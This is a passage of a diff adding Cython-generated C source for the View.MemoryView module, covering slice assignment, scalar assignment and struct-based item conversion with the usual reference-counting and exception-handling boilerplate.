+ */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_obj); + __pyx_r = __pyx_v_obj; + goto __pyx_L0; + + /* "View.MemoryView":435 + * self.setitem_indexed(index, value) + * + * cdef is_slice(self, obj): # <<<<<<<<<<<<<< + * if not isinstance(obj, memoryview): + * try: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("View.MemoryView.memoryview.is_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_obj); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":445 + * return obj + * + * cdef setitem_slice_assignment(self, dst, src): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice dst_slice + * cdef __Pyx_memviewslice src_slice + */ + +static PyObject *__pyx_memoryview_setitem_slice_assignment(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_dst, PyObject *__pyx_v_src) { + __Pyx_memviewslice __pyx_v_dst_slice; + __Pyx_memviewslice __pyx_v_src_slice; + __Pyx_memviewslice __pyx_v_msrc; + __Pyx_memviewslice __pyx_v_mdst; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_t_3; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("setitem_slice_assignment", 0); + + /* "View.MemoryView":448 + * cdef __Pyx_memviewslice dst_slice + * cdef __Pyx_memviewslice src_slice + * cdef __Pyx_memviewslice msrc = get_slice_from_memview(src, &src_slice)[0] # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice mdst = get_slice_from_memview(dst, &dst_slice)[0] + * + */ + if (!(likely(((__pyx_v_src) == Py_None) || likely(__Pyx_TypeTest(__pyx_v_src, __pyx_memoryview_type))))) __PYX_ERR(1, 448, __pyx_L1_error) + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(((struct __pyx_memoryview_obj *)__pyx_v_src), (&__pyx_v_src_slice)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 448, __pyx_L1_error) + __pyx_v_msrc = (__pyx_t_1[0]); + + /* "View.MemoryView":449 + * cdef __Pyx_memviewslice src_slice + * cdef __Pyx_memviewslice msrc = get_slice_from_memview(src, &src_slice)[0] + * cdef __Pyx_memviewslice mdst = get_slice_from_memview(dst, &dst_slice)[0] # <<<<<<<<<<<<<< + * + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) + */ + if (!(likely(((__pyx_v_dst) == Py_None) || likely(__Pyx_TypeTest(__pyx_v_dst, __pyx_memoryview_type))))) __PYX_ERR(1, 449, __pyx_L1_error) + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(((struct __pyx_memoryview_obj *)__pyx_v_dst), (&__pyx_v_dst_slice)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 449, __pyx_L1_error) + __pyx_v_mdst = (__pyx_t_1[0]); + + /* "View.MemoryView":451 + * cdef __Pyx_memviewslice mdst = get_slice_from_memview(dst, &dst_slice)[0] + * + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) # <<<<<<<<<<<<<< + * + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_src, __pyx_n_s_ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyInt_As_int(__pyx_t_2); if (unlikely((__pyx_t_3 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_dst, __pyx_n_s_ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyInt_As_int(__pyx_t_2); if (unlikely((__pyx_t_4 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_5 = __pyx_memoryview_copy_contents(__pyx_v_msrc, __pyx_v_mdst, __pyx_t_3, __pyx_t_4, __pyx_v_self->dtype_is_object); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(1, 451, __pyx_L1_error) + + /* "View.MemoryView":445 + * return obj + * + * cdef setitem_slice_assignment(self, dst, src): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice dst_slice + * cdef __Pyx_memviewslice src_slice + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.setitem_slice_assignment", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":453 + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) + * + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): # <<<<<<<<<<<<<< + * cdef int array[128] + * cdef void *tmp = NULL + */ + +static PyObject *__pyx_memoryview_setitem_slice_assign_scalar(struct __pyx_memoryview_obj *__pyx_v_self, struct __pyx_memoryview_obj *__pyx_v_dst, PyObject *__pyx_v_value) { + int __pyx_v_array[0x80]; + void *__pyx_v_tmp; + void *__pyx_v_item; + __Pyx_memviewslice *__pyx_v_dst_slice; + __Pyx_memviewslice __pyx_v_tmp_slice; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_t_5; + char const *__pyx_t_6; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + PyObject *__pyx_t_9 = NULL; + PyObject *__pyx_t_10 = NULL; + PyObject *__pyx_t_11 = NULL; + PyObject *__pyx_t_12 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("setitem_slice_assign_scalar", 0); + + /* "View.MemoryView":455 + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): + * cdef int array[128] + * cdef void *tmp = NULL # <<<<<<<<<<<<<< + * cdef void *item + * + */ + __pyx_v_tmp = NULL; + + /* "View.MemoryView":460 + * cdef __Pyx_memviewslice *dst_slice + * cdef __Pyx_memviewslice tmp_slice + * dst_slice = get_slice_from_memview(dst, &tmp_slice) # <<<<<<<<<<<<<< + * + * if self.view.itemsize > sizeof(array): + */ + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(__pyx_v_dst, (&__pyx_v_tmp_slice)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 460, __pyx_L1_error) + __pyx_v_dst_slice = __pyx_t_1; + + /* "View.MemoryView":462 + * dst_slice = get_slice_from_memview(dst, &tmp_slice) + * + * if self.view.itemsize > sizeof(array): # <<<<<<<<<<<<<< + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: + */ + __pyx_t_2 = (((size_t)__pyx_v_self->view.itemsize) > (sizeof(__pyx_v_array))); + if (__pyx_t_2) { + + /* "View.MemoryView":463 + * + * if self.view.itemsize > sizeof(array): + * tmp = PyMem_Malloc(self.view.itemsize) # <<<<<<<<<<<<<< + * if tmp == NULL: + * raise MemoryError + */ + __pyx_v_tmp = PyMem_Malloc(__pyx_v_self->view.itemsize); + + /* "View.MemoryView":464 + * if self.view.itemsize > sizeof(array): + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * item = tmp + */ + __pyx_t_2 = (__pyx_v_tmp == NULL); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":465 + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: + * raise MemoryError # <<<<<<<<<<<<<< + * item = tmp + * else: + */ + PyErr_NoMemory(); __PYX_ERR(1, 465, __pyx_L1_error) + + /* "View.MemoryView":464 + * if self.view.itemsize > sizeof(array): + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * item = tmp + */ + } + + /* "View.MemoryView":466 + * if tmp == NULL: + * raise MemoryError + * item = tmp # <<<<<<<<<<<<<< + * else: + * item = array + */ + __pyx_v_item = __pyx_v_tmp; + + /* "View.MemoryView":462 + * dst_slice = get_slice_from_memview(dst, &tmp_slice) + * + * if self.view.itemsize > sizeof(array): # <<<<<<<<<<<<<< + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":468 + * item = tmp + * else: + * item = array # <<<<<<<<<<<<<< + * + * try: + */ + /*else*/ { + __pyx_v_item = ((void *)__pyx_v_array); + } + __pyx_L3:; + + /* "View.MemoryView":470 + * item = array + * + * try: # <<<<<<<<<<<<<< + * if self.dtype_is_object: + * ( item)[0] = value + */ + /*try:*/ { + + /* "View.MemoryView":471 + * + * try: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * ( item)[0] = value + * else: + */ + if (__pyx_v_self->dtype_is_object) { + + /* "View.MemoryView":472 + * try: + * if self.dtype_is_object: + * ( item)[0] = value # <<<<<<<<<<<<<< + * else: + * self.assign_item_from_object( item, value) + */ + (((PyObject **)__pyx_v_item)[0]) = ((PyObject *)__pyx_v_value); + + /* "View.MemoryView":471 + * + * try: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * ( item)[0] = value + * else: + */ + goto __pyx_L8; + } + + /* "View.MemoryView":474 + * ( item)[0] = value + * else: + * self.assign_item_from_object( item, value) # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __pyx_t_3 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->assign_item_from_object(__pyx_v_self, ((char *)__pyx_v_item), __pyx_v_value); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 474, __pyx_L6_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_L8:; + + /* "View.MemoryView":478 + * + * + * if self.view.suboffsets != NULL: # <<<<<<<<<<<<<< + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, + */ + __pyx_t_2 = (__pyx_v_self->view.suboffsets != NULL); + if (__pyx_t_2) { + + /* "View.MemoryView":479 + * + * if self.view.suboffsets != NULL: + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) # <<<<<<<<<<<<<< + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, + * item, self.dtype_is_object) + */ + __pyx_t_4 = assert_direct_dimensions(__pyx_v_self->view.suboffsets, __pyx_v_self->view.ndim); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(1, 479, __pyx_L6_error) + + /* "View.MemoryView":478 + * + * + * if self.view.suboffsets != NULL: # <<<<<<<<<<<<<< + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, + */ + } + + /* "View.MemoryView":480 + * if self.view.suboffsets != NULL: + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, # <<<<<<<<<<<<<< + * item, self.dtype_is_object) + * finally: + */ + __pyx_memoryview_slice_assign_scalar(__pyx_v_dst_slice, __pyx_v_dst->view.ndim, __pyx_v_self->view.itemsize, __pyx_v_item, __pyx_v_self->dtype_is_object); + } + + /* "View.MemoryView":483 + * item, self.dtype_is_object) + * finally: + * PyMem_Free(tmp) # <<<<<<<<<<<<<< + * + * cdef setitem_indexed(self, index, value): + */ + /*finally:*/ { + /*normal exit:*/{ + PyMem_Free(__pyx_v_tmp); + goto __pyx_L7; + } + __pyx_L6_error:; + /*exception exit:*/{ + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __pyx_t_7 = 0; __pyx_t_8 = 0; __pyx_t_9 = 0; __pyx_t_10 = 0; __pyx_t_11 = 0; __pyx_t_12 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (PY_MAJOR_VERSION >= 3) __Pyx_ExceptionSwap(&__pyx_t_10, &__pyx_t_11, &__pyx_t_12); + if ((PY_MAJOR_VERSION < 3) || unlikely(__Pyx_GetException(&__pyx_t_7, &__pyx_t_8, &__pyx_t_9) < 0)) __Pyx_ErrFetch(&__pyx_t_7, &__pyx_t_8, &__pyx_t_9); + __Pyx_XGOTREF(__pyx_t_7); + __Pyx_XGOTREF(__pyx_t_8); + __Pyx_XGOTREF(__pyx_t_9); + __Pyx_XGOTREF(__pyx_t_10); + __Pyx_XGOTREF(__pyx_t_11); + __Pyx_XGOTREF(__pyx_t_12); + __pyx_t_4 = __pyx_lineno; __pyx_t_5 = __pyx_clineno; __pyx_t_6 = __pyx_filename; + { + PyMem_Free(__pyx_v_tmp); + } + if (PY_MAJOR_VERSION >= 3) { + __Pyx_XGIVEREF(__pyx_t_10); + __Pyx_XGIVEREF(__pyx_t_11); + __Pyx_XGIVEREF(__pyx_t_12); + __Pyx_ExceptionReset(__pyx_t_10, __pyx_t_11, __pyx_t_12); + } + __Pyx_XGIVEREF(__pyx_t_7); + __Pyx_XGIVEREF(__pyx_t_8); + __Pyx_XGIVEREF(__pyx_t_9); + __Pyx_ErrRestore(__pyx_t_7, __pyx_t_8, __pyx_t_9); + __pyx_t_7 = 0; __pyx_t_8 = 0; __pyx_t_9 = 0; __pyx_t_10 = 0; __pyx_t_11 = 0; __pyx_t_12 = 0; + __pyx_lineno = __pyx_t_4; __pyx_clineno = __pyx_t_5; __pyx_filename = __pyx_t_6; + goto __pyx_L1_error; + } + __pyx_L7:; + } + + /* "View.MemoryView":453 + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) + * + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): # <<<<<<<<<<<<<< + * cdef int array[128] + * cdef void *tmp = NULL + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.setitem_slice_assign_scalar", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":485 + * PyMem_Free(tmp) + * + * cdef setitem_indexed(self, index, value): # <<<<<<<<<<<<<< + * cdef char *itemp = self.get_item_pointer(index) + * self.assign_item_from_object(itemp, value) + */ + +static PyObject *__pyx_memoryview_setitem_indexed(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value) { + char *__pyx_v_itemp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + char *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("setitem_indexed", 0); + + /* "View.MemoryView":486 + * + * cdef setitem_indexed(self, index, value): + * cdef char *itemp = self.get_item_pointer(index) # <<<<<<<<<<<<<< + * self.assign_item_from_object(itemp, value) + * + */ + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->get_item_pointer(__pyx_v_self, __pyx_v_index); if (unlikely(__pyx_t_1 == ((char *)NULL))) __PYX_ERR(1, 486, __pyx_L1_error) + __pyx_v_itemp = __pyx_t_1; + + /* "View.MemoryView":487 + * cdef setitem_indexed(self, index, value): + * cdef char *itemp = self.get_item_pointer(index) + * self.assign_item_from_object(itemp, value) # <<<<<<<<<<<<<< + * + * cdef convert_item_to_object(self, char *itemp): + */ + __pyx_t_2 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->assign_item_from_object(__pyx_v_self, __pyx_v_itemp, __pyx_v_value); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 487, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":485 + * PyMem_Free(tmp) + * + * cdef setitem_indexed(self, index, value): # <<<<<<<<<<<<<< + * cdef char *itemp = self.get_item_pointer(index) + * self.assign_item_from_object(itemp, value) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.setitem_indexed", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":489 + * self.assign_item_from_object(itemp, value) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + +static PyObject *__pyx_memoryview_convert_item_to_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp) { + PyObject *__pyx_v_struct = NULL; + PyObject *__pyx_v_bytesitem = 0; + PyObject *__pyx_v_result = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + Py_ssize_t __pyx_t_9; + int __pyx_t_10; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("convert_item_to_object", 0); + + /* "View.MemoryView":492 + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + * import struct # <<<<<<<<<<<<<< + * cdef bytes bytesitem + * + */ + __pyx_t_1 = __Pyx_ImportDottedModule(__pyx_n_s_struct, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 492, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_struct = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":495 + * cdef bytes bytesitem + * + * bytesitem = itemp[:self.view.itemsize] # <<<<<<<<<<<<<< + * try: + * result = struct.unpack(self.view.format, bytesitem) + */ + __pyx_t_1 = __Pyx_PyBytes_FromStringAndSize(__pyx_v_itemp + 0, __pyx_v_self->view.itemsize - 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 495, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_bytesitem = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":496 + * + * bytesitem = itemp[:self.view.itemsize] + * try: # <<<<<<<<<<<<<< + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_2, &__pyx_t_3, &__pyx_t_4); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_4); + /*try:*/ { + + /* "View.MemoryView":497 + * bytesitem = itemp[:self.view.itemsize] + * try: + * result = struct.unpack(self.view.format, bytesitem) # <<<<<<<<<<<<<< + * except struct.error: + * raise ValueError, "Unable to convert item to object" + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_unpack); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 497, __pyx_L3_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_PyBytes_FromString(__pyx_v_self->view.format); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 497, __pyx_L3_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_7, __pyx_t_6, __pyx_v_bytesitem}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_8, 2+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 497, __pyx_L3_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_v_result = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":496 + * + * bytesitem = itemp[:self.view.itemsize] + * try: # <<<<<<<<<<<<<< + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + */ + } + + /* "View.MemoryView":501 + * raise ValueError, "Unable to convert item to object" + * else: + * if len(self.view.format) == 1: # <<<<<<<<<<<<<< + * return result[0] + * return result + */ + /*else:*/ { + __pyx_t_9 = __Pyx_ssize_strlen(__pyx_v_self->view.format); if (unlikely(__pyx_t_9 == ((Py_ssize_t)-1))) __PYX_ERR(1, 501, __pyx_L5_except_error) + __pyx_t_10 = (__pyx_t_9 == 1); + if (__pyx_t_10) { + + /* "View.MemoryView":502 + * else: + * if len(self.view.format) == 1: + * return result[0] # <<<<<<<<<<<<<< + * return result + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_result, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 502, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L6_except_return; + + /* "View.MemoryView":501 + * raise ValueError, "Unable to convert item to object" + * else: + * if len(self.view.format) == 1: # <<<<<<<<<<<<<< + * return result[0] + * return result + */ + } + + /* "View.MemoryView":503 + * if len(self.view.format) == 1: + * return result[0] + * return result # <<<<<<<<<<<<<< + * + * cdef assign_item_from_object(self, char *itemp, object value): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_result); + __pyx_r = __pyx_v_result; + goto __pyx_L6_except_return; + } + __pyx_L3_error:; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":498 + * try: + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: # <<<<<<<<<<<<<< + * raise ValueError, "Unable to convert item to object" + * else: + */ + __Pyx_ErrFetch(&__pyx_t_1, &__pyx_t_5, &__pyx_t_6); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_error); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 498, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = __Pyx_PyErr_GivenExceptionMatches(__pyx_t_1, __pyx_t_7); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_ErrRestore(__pyx_t_1, __pyx_t_5, __pyx_t_6); + __pyx_t_1 = 0; __pyx_t_5 = 0; __pyx_t_6 = 0; + if (__pyx_t_8) { + __Pyx_AddTraceback("View.MemoryView.memoryview.convert_item_to_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_6, &__pyx_t_5, &__pyx_t_1) < 0) __PYX_ERR(1, 498, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_1); + + /* "View.MemoryView":499 + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + * raise ValueError, "Unable to convert item to object" # <<<<<<<<<<<<<< + * else: + * if len(self.view.format) == 1: + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Unable_to_convert_item_to_object, 0, 0); + __PYX_ERR(1, 499, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "View.MemoryView":496 + * + * bytesitem = itemp[:self.view.itemsize] + * try: # <<<<<<<<<<<<<< + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_ExceptionReset(__pyx_t_2, __pyx_t_3, __pyx_t_4); + goto __pyx_L1_error; + __pyx_L6_except_return:; + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_ExceptionReset(__pyx_t_2, __pyx_t_3, __pyx_t_4); + goto __pyx_L0; + } + + /* "View.MemoryView":489 + * self.assign_item_from_object(itemp, value) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("View.MemoryView.memoryview.convert_item_to_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_struct); + __Pyx_XDECREF(__pyx_v_bytesitem); + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":505 + * return result + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + +static PyObject *__pyx_memoryview_assign_item_from_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value) { + PyObject *__pyx_v_struct = NULL; + char __pyx_v_c; + PyObject *__pyx_v_bytesvalue = 0; + Py_ssize_t __pyx_v_i; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + Py_ssize_t __pyx_t_7; + PyObject *__pyx_t_8 = NULL; + char *__pyx_t_9; + char *__pyx_t_10; + char *__pyx_t_11; + char *__pyx_t_12; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("assign_item_from_object", 0); + + /* "View.MemoryView":508 + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + * import struct # <<<<<<<<<<<<<< + * cdef char c + * cdef bytes bytesvalue + */ + __pyx_t_1 = __Pyx_ImportDottedModule(__pyx_n_s_struct, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 508, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_struct = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":513 + * cdef Py_ssize_t i + * + * if isinstance(value, tuple): # <<<<<<<<<<<<<< + * bytesvalue = struct.pack(self.view.format, *value) + * else: + */ + __pyx_t_2 = PyTuple_Check(__pyx_v_value); + if (__pyx_t_2) { + + /* "View.MemoryView":514 + * + * if isinstance(value, tuple): + * bytesvalue = struct.pack(self.view.format, *value) # <<<<<<<<<<<<<< + * else: + * bytesvalue = struct.pack(self.view.format, value) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_pack); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyBytes_FromString(__pyx_v_self->view.format); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 